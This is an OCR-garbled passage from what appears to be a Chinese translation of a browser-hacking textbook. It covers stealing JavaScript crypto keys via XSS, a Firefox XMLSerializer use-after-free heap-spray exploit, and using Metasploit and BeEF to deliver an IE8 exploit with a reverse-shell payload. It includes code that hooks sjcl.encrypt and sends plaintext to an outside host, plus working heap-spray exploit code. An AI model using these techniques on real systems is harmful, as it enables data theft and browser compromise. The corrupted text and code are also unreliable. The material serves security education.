cookie 中 的 令 牌 。 然 后 , 可 以 在 后 续 对 Web 应 用 的 访问 中 使 用 该 令 牌 , 让 你 模仿 受害 者 以 访问 应 用 。 

如 果 Web 应 用 中 存在 这 样 的 XSS 漏 洞 ， 可 以 使 用 几乎 同样 的 攻击 取得 敏感 的 密 钥 。 不 过 , 不 
会 存在 由 于 设置 讨厌 的 HttpOnly 保 护 机 制 而 导致 的 问题 ， 因 为 cookie 中 不 会 保存 密 钥 。 此 外 ， 不 
用 急于 一 时 ， 因 为 密 钥 不 会 过 期 ， 这 一 点 与 会 话 令 牌 不 同 。 取 得 密 钥 之 后 ， 就 可 以 解密 所 有 加 密 
数据 ， 或 者 对 任何 数据 签名 。 

假设 开发 者 有 一 个 “隐藏 的 ” 密 钥 ， 当 然 更 好 的 叫 法 是 “模糊 过 的 ” 密 钥 。 比 如 ， 考 虑 如 下 
JavaScript 代 码 : 

var key = String.fromCharCode(75 % 80 * 2 * 6 / 12); 

在 这 个 例子 中 , 可 以 看 到 密 钥 是 一 个 数学 函数 , 然后 结果 被 转换 成 一 个 字符 。 这 是 个 非常 简单 
的 例子 ， 但 这 个 密 钥 的 值 一 开始 并 不 明了 。 通 过 将 其 复制 粘贴 到 Firebug， 就 可 以 知道 这 个 密 钥 的 
值 是 字母 K。 分 析 JavaScript 代 码 时 ， 可 以 发 现 类 似 的 实现 ， 因 此 问题 就 是 执行 该 代码 以 得 到 密 钥 。 

等 一 下 ， 为 什么 可 以 使 用 目标 浏览 需 中 的 实现 ， 还 要 费劲 去 找 什 么 密 钥 呢 ? 

Vladimir Vorontsov 就 是 这 样 做 的 。 他 在 一 个 依赖 于 JavaScript 和 数字 签名 消息 的 远程 银行 系统 
F, 发 现 了 类 似 的 问题 ”。Vorontsov 使 用 了 一 个 XSS 漏 洞 ， 以 演示 在 用 户 认 证 之 后 签署 任意 文档 ， 
从 而 任何 处 理 相应 文档 的 系统 都 会 信任 该 假 签名 。 

3. AARAA 

如 果 信 任 假 的 签名 还 不 够 ， 那 么 大 多 数 JavaScript 对 象 的 函数 都 可 以 被 覆盖 (有 作用 域 的 区 
别 )。 换 句 话说， 任何 加 载 到 DOM 中 的 JavaScript 肢 本， 都 可 以 覆盖 用 于 执行 加 密 的 函数 。 

下 面 来 看 一 个 例子 ， 看 看 如 何 使 用 斯 坦 福 大 学 JavaScript 加 密 库 〈 Stanford JavaScript Crypto 
Library， 简 称 SJCL ) VAHRAM. fJ JavaScripti], SEAL PARASITE : 


var sjcl_lib = document.createElement ('script'); 

Sjcl lib.src = 
"https://raw.github.com/bitwiseshiftleft/sjcl/master/sjcl.js"; 

document.getElementsByTagName('head')[0].appendChild(sjcl lib); 


把 这 个 库 加 载 到 DOM 中 以 后 ， 使 用 以 下 代码 来 测试 encrypt 函数 : 

Sjcl.encrypt("password", "secret") 

结果 是 一 个 包含 密 文 (ct ) 及 其 他 参数 的 数据 结构 , 可 用 于 加 密 过 程 。 如 有 果 能 拦截 这 个 过 程 ， 
偷偷 放 进 我 们 自己 的 密码 就 好 了 。 没 问题 ， 可 以 做 到 。 
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如 果 这 个 Web 应 用 中 存在 XSS 漏 洞 ， 那 么 就 有 机 会 覆盖 加 密 函 数 。 别 忘 了 ，XSS 漏 洞 是 互联 
网 上 最 为 常见 的 漏洞 ， 大 多 数 应 用 中 都 会 存在 。 

如 果 提 供 内 容 的 网 站 可 以 被 控制 , 那么 它 一 定 会 提供 另 一 个 地 方 , 供 我 们 覆盖 加 密 函 数 。 任 
何 使 用 JavaScript 加 密 的 Web 应 用 ,都 必须 完全 信任 提供 内 容 的 来 源 ， 因为 其 中 任何 一 个 都 可 以 盗 
取 密 文 和 密 钥 。 

下 面 的 代码 展示 了 不 仅 可 以 透明 地 覆盖 encrypt 国 数 ， 而 且 还 可 以 取得 密 文 : 


chained_encrypt = sjcl.encrypt 
sjcl.encrypt = function (password, plaintext, params, rp) { 
var img = document.createElement ("img"); 
img.src = "http://browserhacker.com/?ch06secret-" + plaintext; 
document .head.appendChild(img) ; 
return chained_encrypt (password, plaintext, params, rp) 


} 


























Sjcl.encrypt("password", "secret") 

以 上 代码 连 缀 了 encrypt 函 数 ,所 以 仍然 会 调用 它 。 应 用 不 会 注意 到 运行 过 程 中 的 任何 不 同 。 
更 重要 的 是 ， 我 们 已 经 向 函数 链 中 插 人 了 新 的 链接 ， 在 加 密 之 前 将 盗 取 秘 密 数 据 。 取 得 数据 后 ， 
就 会 将 其 透明 地 发 送 到 http://browserhacker.com， 然 后 再 返回 原始 的 程度 执行 流 。 
































6.5.2 JavaScript 和 堆 利 用 


本 小 节 讨 论 现代 浏览 器 中 的 底层 利用 技术 。 本 书 不 会 过 于 深入 地 讨论 这 些 技术 , 但 大 致 理解 
这 些 技 术 有 助 绕 过 浏览 器 的 安全 机 制 。 好 了 ,现在 大 家 集中 一 下 精力 , 我 们 要 进入 错综复杂 的 内 
存 管理 和 UAF (Use After Free， 释 放 后 使 用 ) 利用 环节 了 。 

1. 内 存 管 理 

应 用 使 用 的 内 存 由 底层 操作 系统 负责 管理 。 换 名 话说 ,应 用 不 能 直接 访问 物理 内 存 。 操 作 系 
统 会 利用 虚拟 内 存 的 概念 , 强制 保证 内 存 与 运行 进程 隔离 , 让 每 个 进程 都 好 像 能 够 访问 整个 线性 
地 址 空间 一 样 。 每 个 进程 都 有 自己 的 内 存 空间 ,用 于 存储 和 操作 自己 的 数据 。 内 存 主 要 分 成 堆 内 
存 和 栈 内 存 ， 以 及 进程 特定 的 模块 和 库 。 栈 内 存 主要 用 于 存储 进程 函数 的 本 地 变量 ( 以 及 其 他 数 
据 )， 以 及 与 执行 相关 的 元 数据 ， 比 如 程序 链接 信息 、 函 数 帧 和 溢出 的 注册 表 。 堆 内 存 用 于 存储 
运行 期 间 动态 分 配 的 数据 。 所 有 现代 应 用 都 使 用 动态 内 存 分 配 和 管理 技术 , 因为 正确 地 使 用 这 种 
技术 有 助 于 提升 性 能 。 

浏览 器 利用 依赖 于 修改 内 存 ,以 便 将 执行 流转 向 对 攻击 者 有 利 的 方面 。 与 安全 行业 的 很 多 部 
门 一 样 ， 内 存 管理 的 防御 领域 也 存在 着 “军备 竞赛 "， 出 现 新 的 利用 技术 ， 就 会 出 现 新 的 安全 机 
fil, ECMIASLR*', DEP”, SafeSEH*ilscookie™*. 

你 的 目标 是 利用 你 能 够 掌控 的 功能 去 修改 和 组 织 内 存 结构 ,以 便于 你 进一步 人 侵 。 对 于 浏览 
器 而 言 , 实现 这 一 点 的 最 有 效 途径 就 是 使 用 JavaScript。Alexander Sotirov2 在 他 的 论文 “Heap Feng 
Shui with JavaScript” 中 ， 展 示 了 一 些 以 这 种 方式 来 组 织 内 存 的 基本 方式 。 他 的 研究 使 用 的 是 正 ， 
而 以 下 我 们 的 例子 将 使 用 Firefox。 
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2. Firefox 与 jemalloc 

内 存 管理 器 或 者 内 存 分 配器 ,负责 管理 分 配 到 堆 的 虚拟 内 存 。 因 此 , 也 有 人 称 它们 为 堆 内 存 
管理 器 或 堆 内 存 分 配器 。 操 作 系统 为 所 有 应 用 提供 了 一 个 内 存 管理 器 ， 并 暴露 了 malloc 或 其 他 类 
似 的 系统 函数 。 然 而 ， 像 浏览 器 这 样 的 大 型 复杂 应 用 , 通常 都 会 在 操作 系统 提供 的 内 存 管理 器 之 
上 实现 自己 的 内 存 管理 器 。 具 体 来 说 ， 这 些 应 用 会 使 用 malloc 问 操作 系统 请 求 大 片 内 存 区 域 。 取 
得 这 片 内 存 区 域 之 后 ， 它 们 就 会 使 用 自己 的 内 存 管理 器 来 管理 。 这 样 做 是 为 了 实现 更 好 的 性 能 ， 
因为 应 用 比 操作 系统 提供 的 通用 分 配器 更 了 解 自己 的 动态 内 存 需求 。 

jemalloc 就 是 一 个 内 存 分 配器 的 实现 , 最 初 诞生 于 2005 年 ， 然 后 被 用 于 FreeBSD。 相 对 于 传统 
的 malloc 方 法 ，jemalloc 改 进 了 并 发 和 可 扩展 的 性 能 *。 它 是 通过 改进 内 存 数据 存 取 的 方式 来 实现 
这 个 目标 的 。 结 果 ， 包 括 Firefox 在 内 的 很 多 著名 项 目 都 采用 jemalloc。 

Firefox 使 用 jemalloc 在 它 支持 的 平台 上 进行 动态 内 存 管理 ， 这 些 平台 包括 Windows Linux, 
OS X 和 安 卓 。 这 就 意味 着 攻击 者 必须 理解 jesmalloc， 才 能 对 它 所 管理 的 堆 内 存 实施 攻击 。 

根据 对 象 只 被 它 周 围 的 环境 影响 的 局 部 性 原理 ( principle of locality ) “，jemalloc 要 尽力 连 
续 地 分 配 内 存 。 具 体 来 说 ，jemalloc 会 将 内 存 切 分 成 固定 大 小 的 块 。 在 Firefox 中 ， 每 个 块 的 大 小 
为 1 MB 。jemalloc 使 用 这 些 块 来 存储 其 他 所 有 类 型 的 数据 结构 ， 以 及 用 户 请 求 的 内 存 。 为 了 降 
低 线程 间 发 生 锁 争 用 的 概率 ,jemalloc 使 用 arena 来 管理 这 些 块 。 然 而 ，Firefox 默 认 只 硬 编 码 了 一 
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arena. 

在 Firefox 中 ， 块 会 被 进一步 分 为 run ( 访问 )， 负 责 最 大 2048 字 市 的 请 求 和 分 配 需求 。 每 个 run 
会 记录 这 些 空间 的 空闲 及 占用 的 区 域 (region )。 区 域 是 由 用 户 分 配 (比如 malloc 调 用 ) 返回 的 堆 
项 目 。 每 个 run 都 与 一 个 bin 关 联 。bin 负 责 存储 还 有 空间 区 域 的 run 的 树 形 列表 。 每 个 bin 又 与 一 个 
size class 关联 ， 并 管理 该 size class 的 区 域 。 图 6-27 是 这 些 概念 的 一 个 概况 。 

3. 为 利用 重 排 Firefox 内 存 

为 了 实现 利用 ， 关 键 在 于 把 jemalloc 内 存 重新 排列 为 适合 攻击 的 状态 。 这 个 状态 可 以 让 内 存 
分 配器 的 行为 变 得 可 以 预测 、 值 得 信赖 ， 并 为 你 的 入 侵 提供 便利 。 比 如 ， 正 常情 况 下 ,应 用 的 用 
户 在 应 用 进行 动态 分 配 内 存 时 ,无 法 得 知 内 存 管理 器 返回 的 内 存 空间 信息 。 而 在 利用 过 程 中 , 这 
个 信息 是 必要 的 ， 同 时 也 需要 能 够 被 攻击 者 可 靠 地 预测 出 来 。 

为 了 确保 内 存 处 于 这 种 状态 ， 需 要 进行 大 量 的 内 存 分 配 。 这 种 技术 被 称 为 堆 喷射 (heap 
spraying )。 取 得 了 连续 的 run 之 后 ， 就 需要 每 隔 一 个 区 域 就 释放 一 个 区 域 。 这 样 会 在 你 正 试图 操 
纵 的 size class 的 多 个 run 中 ， 制 造 出 “洞口 ”或 “缺口 "。 利 用 的 最 后 一 步 是 触发 堆 溢出 ， 下 一 小 
节 会 介绍 。 

这 种 方法 可 以 让 你 对 内 存 布局 获得 更 多 控制 权 ， 并 提供 利用 的 成 功 概率 。 

4. Firefox 的 例子 

2013 年 年 初 ，Michal Luczaj 向 ZeroDay Initiative 报 告 了 Firefox 中 的 一 个 漏洞 ”。 这 个 漏洞 与 
DOM 中 的 XMLserializer 函 数 可 能 被 误 用 导致 应 用 骨 泪 相关。 这 是 Firefox 独 有 的 而 且 没 有 文档 
载 明 的 一 个 函数 的 结果 。 
遗憾 的 是 ， 调 用 这 个 函数 的 时 候 ， 人 们 大 多 不 会 做 足够 的 检查 ， 因 此 导致 它 出 现 漏洞 。 
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Patroklos Argyroudis 和 Chariton Karamitas 做 了 进一步 研究 ， 发 现 了 这 个 漏洞 以 及 如 何 通 过 它 实现 
执行 任意 代码 的 更 多 细节 。 







arena bin t bins[] 


bins(0] (size 2) | bins[1] (size 4) | binsl2] (size 8) ... 





arena bin t 
bins{0] (size 2) 


(om) 





[56-27 jemalloc 的 架构 


被 披露 的 缺陷 是 XMLserializer 对 象 中 的 一 个 UAF 漏 洞 。 在 UAF 漏 洞 中 ， 分 配 的 堆 区 域 被 
其 他 对 象 引用 。 随 后 这 个 区 域 被 释放 ， 但 由 于 忘记 运行 清理 操作 之 类 的 bug， 引 用 它 的 对 象 还 会 
继续 引用 它 ， 于 是 就 导致 了 悬 摆 指 针 (dangling reference )。 如 果 你 能 通过 堆 喷 射 之 类 的 方式 控制 
释放 的 区 域 ， 就 可 以 通过 悬 摆 指 针 实现 任意 代码 的 执行 。 

为 了 利用 这 个 UAF xLserializer 漏 洞 ,需要 几 个 步骤 。 第 一 阶段 ， 重 复 分 配 大 字符 串 ， 
直至 堆 扩 展 到 JavaScript 利 用 中 硬 编码 的 某 个 高 地 址 。 在 这 个 例子 中 ， 假 设 前 述 地 址 为 : 
0x117012000. 

实现 这 个 初始 堆 喷射 的 JavaScript 代 码 如 下 ; 

/* 第 一 阶段 要 执行 的 大 小 和 数量 


* 这 一 阶段 目标 是 `'nsHTMLElement' 
* 的 一 个 实例 `mNextSibling' 指 向 的 类 */ 
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BIG_SPRAY_SZ = 65534; 
BIG_SPRAY_NUM = 1 << 11; 
var buf = ""; 

var container 1 = []; 


// ®% A pad' AAMBAA str! 
// 数量 为 "1ength' 
function lpad(str, pad, length) { 
while(str.length < length) 
str = pad + str; 
return str; 


} 


// 小 痛 字 节 序 Unicoqde 字 符 串 用 双 倍 字 长 
function get_qwle(dqw){ 


wh = lpad(((dw >> 16) & Oxffff).toString(16), "0", 4); 
wl = lpad((dw & Oxffff).toString(16), "0", 4); 
escaped = "Su" + wl + "%u" + wh; 


return unescape (escaped); 


} 


/* 13% 3 d FUnicode$ i # AFK 
* (由 于 精度 限制 ， 不 能 给 函数 传 入 64 位 整数 ， 
* 这 里 用 双 倍 字 长 代替 ) */ 
function get_qwle(dwh, dwl) { 
return get dwle(dwl) + get dwle(dwh); 


// ^callq *0x5f8($rax)' P rax'WéMA 
buf += get qwle(0x117012000); /7/ 小 端 字 节 序 Unicode 字 符 串 用 四 倍 字 长 


// ^testb $0x8，0x2c(%r14)' 要 检查 的 标志 
buf += Unescape("%u8888%u8888%u8888%u8888"); 
buf += unescape("$u8888$u8888$u8888$u08888"); 


// ^rip'WMá, BBA ^$rax + Ox5f8' 
buf += get qwle(0x4142434445464748); 
buf = generate(buf, BIG_SPRAY_SZ); 





for(i = 0; i < BIG_SPRAY_NUM; i++) 
container 1[i] = buf.toLowerCase(); 


如 果 这 次 堆 喷 射 成 功 ， 内 存 地 址 0x117012000 处 内 容 的 模式 将 类 似 图 6-28 所 示 。 

由 于 存在 漏洞 的 原因 ， 本 次 JavaScript 利 用 中 的 硬 编码 地 址 最 终 会 到 达 rax 寄 存 器 ， 而 且 由 于 
该 漏洞 ， 目 标 进程 会 运行 call *0x5f8 (Srax) 。 因 为 rax 寄 存 器 中 的 值 是 攻击 者 通过 JavaScript 
利用 控制 的 , 所 以 前 面 的 指令 将 把 Firefox 的 执行 流 引 导 到 该 值 所 表示 的 地 址 。 堆 喷射 是 经 过 巧妙 
设计 的 ， 因 此 地 址 0x117012000 +0x5f8 处 的 值 包含 0x4142434445464748， 演 示 了 对 Firefox 执 行 流 
的 控制 。 
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图 6-28 ”内 存 中 的 结果 内 容 





0x117012000 0x0000000117012000 
E 0x8888888888888888 
0x8888888888888888 

0x4142434445464748 


0x117012000 + Ox5f8 0x4142434445464748 








利用 的 第 二 阶段 ， 再 次 使 用 JavaScript， 以 128 字 节 的 字符 串 喷射 堆 内 存 。 在 经 过 几 次 如 此 这 
般 的 分 配 请 求 后 , jemalloc 会 尝试 将 它们 连续 放 到 内 存 中 。 接 下 来 , 使 用 aelete 来 释放 其 他 分 配 ， 








使 内 存 状 态 的 模式 如 图 6-29 所 示 。 











图 6-29 ”内 存 中 的 结果 模式 











标记 为 “空闲 ”的 区 域 并 非 真 的 空闲 ， 只 是 被 标记 为 空闲 而 已 ， 并 没有 被 Firefox 的 JavaScript 
引擎 释放 掉 。 第 3 章 介绍 过 SpiderMonkey 这 个 Firefox 的 JavaScrip 坦 | 擎 ， 它 只 会 在 自己 认为 重要 的 


时 候 ， 才 真正 释放 这 些 内 存 。 为 了 强制 释放 这 些 内 存 ， 需 要 创 





发 SpiderMonkey 的 垃圾 收集 器 。 为 





此 ， 需 要 制造 堆 内 存 不 足 的 情况 ， 强 迫 垃 圾 收集 器 清理 不 再 使 用 的 区 域 。 
这 样 做 的 结果 就 是 堆 内 存 中 受 控 制 的 堆 区 域 间 会 出 现 128 字 节 的 缺口 。 采 用 这 个 技术 可 以 确 





保 以 后 分 配 的 128 字 节 ， 极 有 可 能 恰好 放 到 刚刚 创建 的 这 些 堆 


缺口 内 。 


利用 的 第 三 个 阶段 涉及 通过 C++ 类 HTMLUnknownElement 动 态 创建 一 些 HTML 元 素 ， 每 个 























128 字 节 。 因 为 Firefox 的 HTML 泻 染 器 及 其 JavaScript 引 擎 都 是 通过 C++ 编程 语言 实现 的 ， 所 以 所 
有 HTML 元 素 和 JavaScript 对 象 ， 以 及 其 他 浏览 器 结构 都 是 C++ 类 的 产物 。 拥 有 虚拟 方法 的 C++ 类 

















也 拥有 一 个 虚拟 函数 表 , 其 中 包含 指向 相应 方法 的 函数 指针 。 














对 希望 破坏 这 个 虚拟 函数 表 的 攻击 


者 而 言 ， 了 解 它 很 重要 ， 这 样 才 能 把 浏览 器 的 执行 流 引导 至 你 期 望 的 方向 。 
如 果 一 切 都 按 计划 顺利 完成 , 这 些 区 域 将 填充 到 前 一 阶段 创建 的 缺口 中 。 重要 的 是 不 要 把 所 





ARIES E. 
以 下 JavaScript 代 码 用 于 在 序列 化 时 修改 DOM 树 ， 触 发 漏 


var s = new XMLSerializer(); 

// 要 创建 的 触发 UAF 的 DOM 子 元 素 的 数量 
NUM_CHILDREN = 64; 

// 第 二 阶段 允许 执行 的 数量 

// 本 阶段 目标 是 `HTMLE1ement ' 的 实例 
SMALL_SPRAY_NUM = 1 << 21; 
GC_TRIGGER_THRESHOLD = 100000; 

















洞 条 件 : 
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// 和 触发 垃圾 收集 
function trigger. gc() 


{ 


var gc = []; 
for(i = 0; i < GC_TRIGGER_THRESHOLD; i++) { 
gc[i] = new Array(); 


} 


return gc; 


} 


var stream = 
{ 
write: function() 
{ 
// 删除 子 元 素 并 触发 垃圾 收集 
// 会 触发 某 些 堆 漏洞 
for (i = 0; i < NUM_CHILDREN; i++) 
{ 
parent .removeChild(children[i] ) 
delete children[il]; 
children[i] = null; 


} 
trigger gc(); 


// 取得 上 面 创建 的 漏洞 bul ' 仍 然 保存 着 必要 数据 ) 
for (i = 0; i < SMALL_SPRAY_NUM; i += 2) 
container_2[i] = buf.toLowerCase(); 
} 
he 


s.serializeToStream(parent, stream, "UTF-8"); 

垃圾 收集 器 会 被 调用 ， 以 释放 相应 的 堆 区 域 ， 而 且 一 次 小 型 堆 喷 射 会 发 生 ， 以 重新 分 配 之 前 
由 HTMLUnknownElement 实例 占据 的 内 存 区 域 o 这 样 你 就 可 以 控制 一 个 HTMLUnknownE1 ement 
实例 的 虚拟 表 ， 从 而 达到 执行 任意 代码 的 目的 。 事 实 上 ， 这 里 是 在 mNextsipling 指 向 的 C++ 类 
上 触发 的 UAF。 

关于 这 个 漏洞 ， 已 经 有 开发 者 提交 了 bug 报 告 。 查 看 Mozilla 的 Bugzilla 报 告 "， 会 看 到 一 条 评 
Wit: “WF, 我 们 向 web : /暴露 了 serializeToStream。” 这 很 可 能 会 促使 安全 研究 人 员 去 研究 这 个 
产品 的 其 他 方面 ， 看 是 不 是 有 开发 人 员 故 意 留 出 了 漏洞 。 

虽然 这 里 举 的 例子 并 没有 自己 执行 代码 , 但 以 此 为 基础 可 以 通过 很 多 手段 去 设置 64 位 指令 指 
针 或 RIP 值 ， 指 向 内 存 中 任意 位 置 的 代码 ， 从 而 实现 代码 执行 。 注 入 的 代码 取决 于 实施 利用 的 平 
台 。 这 时 候 可 能 使 用 Metasploit 之 类 的 工具 比较 好 ， 因 为 它 提供 了 针对 不 同 平台 定制 利用 的 途径 。 
要 了 人 解 关于 这 个 bug 的 完整 的 概念 验证 和 其 他 代码 ， 请 参考 https://browserhacer.com。 
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6.6 ”使 用 Metasploit 取得 shell 


提 到 利用 ， 对 于 很 多 渗透 测试 人 员 来 说 ，Metasploit 是 第 一 个 会 想到 的 工具 。Metasploit 是 一 
个 渗透 测试 框架 。 为 什么 是 一 个 框架 ?因为 它 针对 渗透 测试 生命 周期 的 各 个 层面 , 都 设计 了 相应 
的 支持 功能 。 

对 利用 开发 者 来 说 ，Metasploit 简 化 了 创建 利用 的 必要 工作 ， 而 且 利 用 可 以 做 到 跨 平 台 和 跨 
系统 。 这 个 框架 提供 了 利用 开发 者 需要 的 很 多 功能 ,包括 随机 化 的 工具 配备 , 针对 多 个 环境 和 系 
统 的 预 加 固 的 shel，VNC 连 接 处 理 ， 以 及 利用 可 能 需要 执行 的 其 他 类 型 的 payload。 

对 于 利用 的 使 用 者 、 渗 透 测试 人 员 ， 以 及 系统 管理 员 来 说 ，Metasploit 的 用 户 界 面 简 化 了 执 
行 利 用 的 过 程 , 提供 了 测试 系统 的 更 简单 的 方法 。 无 论 什么 使 用 场景 , 所 有 信息 都 能 够 唾 手 可 得 ， 
让 各 个 层面 的 用 户 都 能 理解 利用 的 目的 是 什么 , 影响 有 和 多大， 如何 运作 以 及 如 何 检 测 它 ,而且 还 
为 测试 提供 了 一 个 可 以 重 现 的 场所 。 

Metasploit 为 发 现 和 枚 举 提 供 了 辅助 模块 ， 能 让 我 们 : 
O 发 现存 在 漏洞 的 机 咒 ; 

a 确定 机 器 上 运行 了 哪些 服务 ; 

a 枚 举 服务 ; 

a 收集 系统 中 关于 协议 的 特定 信息 。 

这 些 模块 有 助 于 发 现 网 络 上 的 机 器 ， 以 及 系统 可 能 存在 哪些 漏洞 。 虽 然 Metasploit 也 可 以 用 
于 发 现 , 但 它 不 是 漏洞 扫描 器 。 换 句 话 说， 它 要 接收 其 他 一 些 工具 的 漏洞 扫描 结果 ， 然 后 基于 交 
又 引用 的 CVE 和 利用 模块 ， 确 定 哪个 模块 利用 哪个 漏洞 。 

上 面 说 的 这 些 功能 都 很 棒 , 但 我 们 这 里 要 说 的 是 利用 某 些 系统 。 为 了 了 解 在 攻击 浏览 器 的 时 
候 还 可 以 怎样 使 用 Metasploit， 以 下 几 小 节 将 讨论 在 装 有 正 8 的 Windows 7 机 右上， 如何 使 用 
Metasploit 取 得 远程 系统 上 的 shell。 


































































































6.6.1 Metasploit 起 步 





如 果 你 手头 上 没有 Metasploit， 那 么 可 以 安装 Kali Linux， 地 址 为 http://www.kali.org/。Kali 是 
一 个 默认 带 Metasploit 的 标准 渗透 测试 分 发 版 。Metasploit 可 以 在 运行 Ruby 的 任何 系统 中 运行 ， 
此 只 要 你 的 机 器 上 有 Ruby， 那 就 可 以 从 http:/www.metasploit.com/ 得 到 Metasploit。 

首先 ， 使 用 msfconsole 命 令 启 动 Metasploit， 这 样 就 会 输出 一 个 启动 画面 ， 后 跟 一 个 msf > 
提示 符 。 加 载 完 Metasploit 之 后 ， 可 以 做 一 些 事 ， 包括: 
Ouse (使 用 ) 模块 ; 
口 取得 某 个 模块 的 info (信息 ); 
O search (搜索 ) 某 个 模块 ; 
O show ( 显示 ) 某 个 模块 的 信息 。 
要 搜索 针对 IE8 的 所 有 模块 ， 可 以 输入 search IE8， 如 下 所 示 : 
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msf > search IE8 
[!] Database not connected or cache not built, using slow search 


Matching Modules 


exploit /windows/browser/adobe_flashplayer_arrayindexing 
2012-06-21 00:00:00 UTC great Adobe Flash Player AVM 
Verification Logic 
Array Indexing Code 
Execution 
exploit /windows/browser/ie_cgenericelement_uaf 
2013-05-03 00:00:00 UTC good MS13-038 Microsoft 
Internet Explorer 
CGenericElement 
Object Use-After-Free 
Vulnerability 
<snipped for brevity> 


要 获得 关于 某 个 模块 的 更 多 信息 ,五 可 以 输入 info exploit/windows/browser/ie_cgene- 
ricelement_uaf, 例如: 


msf> info exploit/windows/browser/ie cgenericelement uaf 


Name: MS13-038 Microsoft Internet Explorer CGenericElement Object 
Use-After-Free Vulnerability 
Module: exploit/windows/browser/ie_cgenericelement_uaf 
Version: 0 
Platform: Windows 
Privileged: No 
License: Metasploit Framework License (BSD) 
Rank: Good 
«snipped for brevity» 


虽然 这 里 只 给 出 了 部 分 输出 , 但 足以 说 明 如 何 发 现 模 块 ， 以 及 获得 模块 相关 的 信息 了 。 模块 
也 可 以 按照 它们 的 上 下 文 排序 。 这 里 是 一 个 针对 浏览 器 的 Windows 利 用 ， 利 用 的 名 字 是 ie_ 


cgenericelement uaf。 


掌握 了 这 些 基 本 信息 后 ， 下 面 我 们 看 看 怎么 把 它 应 用 于 勾 连 浏览 絮 。 


6.6.2 ”选择 利用 


要 选择 最 适合 攻击 目标 的 Metasploit 利 用 ， 首 先 需要 采集 浏览 器 的 指纹 。 如 果 浏 览 器 已 经 被 
匀 连 到 BeEF, 那 就 已 经 获得 了 一 些 信 息 。 为 了 练习 , 我 们 把 目标 确定 为 一 台 装 有 IE8 的 Windows 7 
勾 连 这 人 台 机 器 后 ， 可 以 在 Details 面 板 中 看 到 自动 识别 的 关于 浏览 器 及 其 所 在 操作 系统 的 信 
息 ， 如 图 6-30 所 示 。 
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Getting Started 
Details Logs Commands 


Ə Category: Browser (5 Items) 
Browser Name: Internet Explorer 
Browser Version: 8 


Browser UA String: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; NET CLR 2.0.50727; NET CLR 3.5.30729; 
NET CLR 3.0.30729; Media Center PC 6.0; NET4.0C; NET4.0E) 


Browser Platform: Win32 
Window Size: Width: 763, Height: 284 


由 Category: Browser Components (16 Items) 
由 Category: Hooked Page (5 Items) 


B Category: Host (6 Items) 
Date: Sun Jul 21 16:00:14 EDT 2013 


Operating System: Windows 7 

Hardware: Unknown 

CPU: 32-bit 

Screen Size: Width: 1026, Height: 698, Colour Depth: 32 














6-30 匀 连 浏览 器 的 详细 信息 


在 此 可 以 看 到 ， 浏 览 器 是 运行 于 32 位 架构 Windows 7 上 的 下 8。 打 开 Category 选 项 卡 ， 还 能 看 
到 这 个 浏览 器 安装 了 Flash 和 Java。 这 些 信息 都 在 初始 化 勾 连 BeEF 的 过 程 中 被 收集 过 来 。BeEF 能 
够 分 析 勾 连 浏览 器 的 更 多 信息 ， 包 括 底层 操作 系统 的 信息 ,但 通常 需要 用 到 Java。 如 果 没 有 检测 
到 Java， 那 该 怎么 办 呢 ? 

首先 就 是 取得 目标 平台 最 近 可 用 的 漏洞 , 然后 从 中 选择 可 以 利用 的 。 有 选择 地 攻击 要 比 全 面 
攻击 更 隐蔽 。BeEF 提 供 了 一 个 流量 信号 灯 系 统 ， 可 以 告诉 你 哪些 利用 是 可 行 的 。 这 个 系统 中 相 
应 颜色 的 含义 如 下 : 
口 绿色 表示 可 以 在 不 通知 用 户 的 情况 下 运行 的 模块 ; 
口 黄色 表示 可 能 会 向 用 户 给 出 提示 的 模块 ; 
a 红色 表示 不 可 能 成 功 的 利用 ; 
口 灰色 表示 利用 尚未 在 目标 环境 的 配置 下 得 到 验证 。 


6.6.3 ” 仅 执行 一 个 利用 


假设 你 已 经 选择 了 一 个 针对 目标 浏览 器 的 利用 , 那么 接 下 来 从 哪里 入 手 呢 ? 接 下 来 要 做 的 就 
是 在 Metasploit 中 启动 Web 服 务 器 ， 然 后 使 用 BeEF 将 浏览 右 定 向 到 Metasploit 的 监听 端口 上 。 

在 处 理 针 对 浏览 器 的 利用 时 ，Metasploit 会 启动 一 个 Web 服 务 器 ， 接 收 浏览 器 请 求 的 信息 。 
Metasploit 的 Web 服 务 器 ,可 能 有 多 个 端点 或 者 URI 路 径 可 供 使 用 。 这 样 ， 一 个 Metasploit 实 例 就 可 
以 在 同一 个 网 络 端口 上 服务 多 个 利用 , 而 无 需 为 每 个 利用 单独 启动 一 个 服务 器 。 为 什么 这 一 点 很 
重要 呢 ? 因为 在 选 定 一 个 服务 利用 的 端口 之 后 , 需要 考虑 目标 怎么 获得 你 的 利用 。 如 果 来 自 目 标 
的 流量 有 可 能 穿越 代理 , 或 有 防火 墙 过 滤 非 标准 端口 ,那么 在 端口 5678 上 服务 利用 可 能 不 会 有 效 。 
由 于 网 络 上 的 潜在 出 口 过 滤 , 在 端口 80 或 443 上 服务 利用 会 更 有 效 。 然 而 , 如 果 有 基于 代理 的 Av , 
那么 穿越 端口 80 的 流量 可 能 会 被 检测 到 并 被 阻拦 。 此 时 端口 443 则 有 可 能 绕 过 代理 。 了 解 你 的 目 
标 以 及 你 自己 可 用 的 手段 ， 有 助 于 决定 选择 哪个 端口 通过 Metasploit 服 务 利用 。 
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勾 连 到 浏览 器 并 且 选 择 了 利用 之 后 ， 回 到 msfconsole 设 置 利 用 。 执 行 use windows/ 


browser/ie_cgenericelement_uaf 和 输入 show options 之 后 ,可 以 看 到 要 设置 的 一 些 选项 ， 
如 图 6-31 所 示 。 


Ju, 



















imsf exploit( ) » show options 





Module options (exploit/windows/browser/ie cgenericelement uaf): 


Name Current Setting Required Description 

OBFUSCATE true no Enable JavaScript obfuscation 

SRVHOST 0.0.0.0 yes The local host to listen on. This must 
be an address on the local machine or 0.0.0.0 

SRVPORT 8080 yes The local port to listen on. 

SSL false no Negotiate SSL for incoming connections 

SSLCert no Path to a custom SSL certificate (defa 


ult is randomly generated) 
SSLVersion SSL3 no 
be used (accepted: SSL2, SSL3, TLS1) 
URIPATH no 
lt is random) 


Specify the version of SSL that should 


The URI to use for this exploit (defau 


Payload options (windows/meterpreter/reverse tcp): 








Name Current Setting Required Description 

EXITFUNC process yes Exit technique: seh, thread, process, no 
ne 

LHOST 192.168.1.132 yes The listen address 

LPORT 4444 yes The listen port 








图 6-31 ”Meterpreter 控 制 台 


